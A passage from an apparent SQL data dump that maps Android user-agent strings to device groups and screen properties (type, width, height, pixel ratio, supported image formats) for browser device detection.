AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-N950N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-N950U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-N950U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-N950W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-N9600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":845,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-N960F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-N960U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-N960U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-N960W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-P580) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_p','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-P585) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_p','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-S367VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-S737TL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-S757BL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-S767VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-T378V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-T380) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-T385) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-T395) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-T580) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-T580) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-T585) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-T585) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-T590) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-T595) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-T825) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-T835) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SNE-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SNE-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SNE-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SO-01J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SO-01K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SO-02J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SO-02K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SO-03J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SO-04H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SO-04J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SO-05K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SOV33) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SOV34) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SOV35) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SOV36) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SOV37) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SP-5250) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SP19403) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SP19504) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SP402) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SP571) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SP9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SQ753) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; STELLAR Z) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; STF-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; STF-L09S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; STG A1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; STG S1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; STG X1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SUGAR Y12s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Silver_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Slimline) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Smart 9 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Smartway_T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Soldier) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Spirit_Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Star_Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Stella X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Stella XS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Studio G4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Studio Mega) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Studio View) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Studio X8 HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Sunny3 Mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Sunny3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Swift 2 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Swift 2 X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Swift 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Symbol X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; T155) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; T3 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; T5524) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; T8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; T8s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TA-1003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TA-1004) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TA-1012) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 